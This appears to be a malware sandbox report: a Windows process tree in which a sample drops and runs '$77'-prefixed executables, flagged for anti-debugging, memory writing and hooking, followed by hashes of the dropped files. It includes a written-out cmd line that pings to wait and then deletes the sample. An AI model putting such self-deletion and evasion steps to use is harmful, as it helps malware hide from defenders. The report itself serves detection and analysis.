C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2888
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2896
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3132
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3384
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3588
-
C:\Users\Admin\AppData\Local\Temp\80dcd56f6d8e3324d715736b66858795.exe"C:\Users\Admin\AppData\Local\Temp\80dcd56f6d8e3324d715736b66858795.exe"2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Users\Admin\AppData\Local\Temp\$77.sedsvc.exe"C:\Users\Admin\AppData\Local\Temp\$77.sedsvc.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:848
-
-
C:\Users\Admin\AppData\Local\Temp\$77.WWI Provider Host.exe"C:\Users\Admin\AppData\Local\Temp\$77.WWI Provider Host.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com -Count 2 -BufferSize 128 -Delay 14⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com -Count 2 -BufferSize 128 -Delay 14⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5108 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:180
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com -Count 2 -BufferSize 128 -Delay 14⤵PID:1976
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:3424
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com -Count 2 -BufferSize 128 -Delay 14⤵PID:1340
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:4084
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\$77.Install.exe"C:\Users\Admin\AppData\Local\Temp\$77.Install.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1056
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\80dcd56f6d8e3324d715736b66858795.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\80dcd56f6d8e3324d715736b66858795.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\system32\PING.EXEping 1.1.1.1 -n 1 -w 1004⤵
- Runs ping.exe
PID:5024
-
-
C:\Windows\system32\PING.EXEping 1.1.1.1 -n 1 -w 9004⤵
- Runs ping.exe
PID:4776
-
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3940
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1460
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3760
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4228
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4652
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2016
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:4576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3468
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:540
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2956
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:516
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 516 -s 3722⤵PID:620
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:5008
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵PID:3972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵PID:3200
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks SCSI registry key(s)
PID:4108
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 994431210eadda20772261f119916d7b RVQ/bmb0LEinsBU/vyMb3g.0.1.0.0.01⤵PID:1420
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:1760
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:772
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:2204
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:4668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4948 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 496 -p 4080 -ip 40802⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2572
-
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2992
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops file in System32 directory
PID:4080 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4080 -s 7122⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2064
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b0dda67d2d471f21db912f0dab2ac01e
SHA1bd9e3de3accc0e55da1bc96c17c8b720e41f8ed3
SHA256dd643e576c1b226aa6c0b6688a8c1e5ff545e3713b99475ee7dd823b420d0030
SHA51265ce262cca48b759bfc8e83052f9d26fb8ed7dc3ac48996cde140eaf95cccc65e7003acc5d7e1b523c0ed893e40719dd67c4e01e3b41326a13146b9b943cd142
-
Filesize
13KB
MD530aecb6398181bd55367e682b18a9575
SHA164a033f55c1ad0c003a447d439f420658412e03b
SHA25602bab7447f780a26a4c03ac4204311e40aeb9b29f5f63e6350297ba16f50e45b
SHA512fbd7b2e31bfdeeda0602157da2567f145025dab4599205856e9b36a0f59199a4b971538924251a0a565d38227a32696e177da31f69e3092d1d2f40eca923d7e3
-
Filesize
3KB
MD5223bd4ae02766ddc32e6145fd1a29301
SHA1900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA2561022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc
-
Filesize
1KB
MD527fdb1beb89b56345e585d480be3026b
SHA12626e41ca27668518d01c04e1579f77027ff31a1
SHA256ef8cd66cc241c6d899919ae6f8369334b20202bd4ad49acfa546d29300c533d2
SHA512bd8208c8763ad8a6c25b6363b8e0e2a3c694e4e0cabfe4ce5d40945bd1f4274b7da976997f825e95c4455bf6b2e20b5bd960609b172f7c70d3521cb2ab24d49a
-
Filesize
1KB
MD53003448ee73abf14d5c8011a37c40600
SHA1b88e9cdbae2e27a25f0858fc0b6d79533fb160d8
SHA256ae448d99735879ecee1dc3088c8f7553ebff461b96172d8f3cb5ff2fa2a12d4a
SHA5120fe52614eec6d75a265ae380aaa1eb153bc35a1baae4d118637798575169d9dba5ad751efab5d7f5dbe9764bfb96e9ae76577a3487429a3383b5b08d5402fe3a
-
Filesize
1KB
MD55161e9d6b9b677b7af6e5bb11a361b91
SHA19fe0a04c2bb86467b9aa584c78db4fc7eccfdd42
SHA256addb0aa038e121d21d7b4bd4ba49316c05294a582cb430eb37ce3925324bd3d0
SHA51295b4a85b4240145d35f1f14bc07ee87b597d484935599f898074be16a7bfcc6fdb36e31e5afedac1c83bdbcbf402c40a3573f2b3512ba521f3ad29fd503f7749
-
Filesize
311KB
MD5964c5fffcba7f353cf12d09675a46de6
SHA19462c1249ef86c39da01b7480f1b2ce4a2a1a7b9
SHA256b54e5acf0ab77f4eadf2920814d9bb3396e678fc5805fb296f9f59c41a1c52ed
SHA512ab6dd5c11abc1abf164532f50a42584189ff1a812b255221a9705dfc47f57120e7d7f241bbb802114de79d165b002283b18a6c96b2e6e3ddc4b062757f0f8565
-
Filesize
6.2MB
MD5ad5caef685124f26f817e265827a7069
SHA1a8680e58ddbfa999614cb2ccf54552fe5efbd4a4
SHA25681997cab9f886b0e2dea5c6e864b5b0709e2f358d8411dd55e04677f4c57449c
SHA512cafe997681594e70d5cd2c07be0379aaa90c5cf3bf45b88ba442c921e7c59248077e25a9925f19f1dcfefab09ca33d2c4a5adfdefc12989b3e7c219dcabaea6a
-
Filesize
6.2MB
MD54794de810c83ee1de52d08431f5d4766
SHA1170b1249ed403ac07df5f44bdfd5bb48abd4e5ac
SHA256e1cc58537e257bda1dc8204b4093d76a6d34187a982f074a0e4c15f202301af8
SHA51274f387a196a3af1fd4a658b39bd40dd6b8d8ab241a59045e15ee620e145667ffc38fe2106896620126261c4164042d4bce9a0bd5cfebb29c4b72bc24b8f6d612
-
Filesize
1.4MB
MD574a214d6fd715df8626541e99fc151f2
SHA16e298b0f0e7b1d740312afc0a625336298f5ab49
SHA2569f54a69141746bdac20bd3f51d3bdcb4002dcb07b1faf925a6310230fc0d2321
SHA512902b292743547a6f31e962230c5fd4253e3f1183bda5c583d382ebbb3bb39b7ae8e7c95236226ae941c58fbfaf9eb960bea8f181d437ed402017a2bfef18025a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
Filesize
512KB
MD5f09caef54cc7b46490d46c8a7b3a37bd
SHA12bb7611218061f8fd80fe47e8afaecc429980325
SHA2560dfce000f937b9ddc334ea084606eed2484f7aee4d8d75ad47f8ad21ddbf2d68
SHA5123a7debb2f890c3b0df847bf025fce0c880108b5427fb7d2c04287e563cea541344a173eba6352d9ef1c3d99a4c138657e47c8cd202839c37eb4aaa08b590accc